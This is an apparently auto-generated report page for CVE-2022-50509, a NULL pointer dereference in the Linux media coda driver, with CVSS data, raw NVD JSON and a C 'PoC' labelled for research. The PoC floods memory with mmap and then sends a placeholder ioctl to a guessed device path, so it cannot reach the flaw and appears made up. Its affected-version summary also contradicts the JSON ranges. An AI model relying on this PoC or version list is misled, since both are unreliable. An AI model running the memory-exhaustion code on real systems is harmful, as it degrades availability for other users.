Security Vulnerability Report
CVE-2022-50509 CVSS 5.5 MEDIUM

CVE-2022-50509

Published: 2025-10-07 16:15:33
Last Modified: 2026-03-17 13:59:35
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

media: coda: Add check for kmalloc

As the kmalloc may return NULL pointer, it should be better to check the return value in order to avoid NULL pointer dereference, same as the others.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10.162
Linux Kernel 5.15.x < 5.15.85
Linux Kernel 5.19.x < 5.19.6
Linux Kernel 6.0.x affected
Linux Kernel 6.1.x affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2022-50509 PoC - Linux kernel coda driver NULL pointer dereference
 * This PoC demonstrates triggering the NULL pointer dereference in the coda driver
 * by exhausting memory before triggering the vulnerable code path.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>

#define CODA_DEVICE "/dev/coda" /* Adjust based on actual device path */

/* Exhaust available memory to make kmalloc return NULL */
void exhaust_memory()
{
    /* Allocate memory in chunks until allocation fails */
    size_t chunk_size = 1024 * 1024; /* 1MB chunks */
    void **ptrs = NULL;
    int count = 0;
    int max = 10000;

    ptrs = malloc(sizeof(void*) * max);
    if (!ptrs)
        return;

    while (count < max) {
        void *p = mmap(NULL, chunk_size, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (p == MAP_FAILED) {
            /* Memory exhausted */
            break;
        }
        /* Touch the memory to ensure it's actually allocated */
        memset(p, 0, chunk_size);
        ptrs[count++] = p;
    }

    printf("[+] Allocated %d MB, memory nearly exhausted\n", count);
}

/* Trigger the vulnerable coda code path */
void trigger_coda_vuln()
{
    int fd;

    /* Try to open the coda device */
    fd = open(CODA_DEVICE, O_RDWR);
    if (fd < 0) {
        printf("[-] Cannot open %s, trying alternative paths\n", CODA_DEVICE);
        /* Try other potential device paths */
        fd = open("/dev/video0", O_RDWR);
        if (fd < 0) {
            printf("[-] No coda device found. Manual exploitation required.\n");
            return;
        }
    }

    printf("[+] Opened device, triggering vulnerable code path...\n");

    /* Perform ioctl operations that trigger kmalloc in coda driver */
    /* The specific ioctl depends on the coda driver implementation */
    /* This is a placeholder - actual ioctl numbers vary */
    int ret = ioctl(fd, 0 /* CODA_IOCTL placeholder */, NULL);
    printf("[+] ioctl returned: %d\n", ret);

    close(fd);
}

int main(int argc, char *argv[])
{
    printf("[*] CVE-2022-50509 PoC - Linux kernel coda NULL deref\n");
    printf("[*] This PoC attempts to trigger NULL pointer dereference\n");
    printf("[*] in the coda driver by exhausting memory first.\n\n");

    /* Step 1: Exhaust memory to make kmalloc fail */
    printf("[*] Step 1: Exhausting system memory...\n");
    exhaust_memory();

    /* Step 2: Trigger the vulnerable code path in coda driver */
    printf("[*] Step 2: Triggering vulnerable coda code path...\n");
    trigger_coda_vuln();

    printf("[*] Done.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50509", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:33.300", "lastModified": "2026-03-17T13:59:34.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: coda: Add check for kmalloc\n\nAs the kmalloc may return NULL pointer,\nit should be better to check the return value\nin order to avoid NULL poineter dereference,\nsame as the others."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.19", "versionEndExcluding": "4.9.337", "matchCriteriaId": "F5C9AB36-1335-46C4-AE68-045ACEB0954D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", 
"matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0209e70ad496c1fcd85c2ec70e6736fd09f95d14", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/11e32126b3e56c3156fb610d793732acd2bdac4f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/441c05485cf1a29eef05c1fd8281716815283315", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6e5e5defdb8b0186312c2f855ace175aee6daf9b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a2c66429b04e85fee44d6d9f455327bf23cf49c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aa17a252dbde432095e390e2092205d4debb12e1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ba9cc9e2035f7a45f5222543265daf7cd51f2530", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/d308c4a035b636756786af91e5f39f9d92d7d42a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d9b37ea8869e4e6da90c07a310d819a78cbd23d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}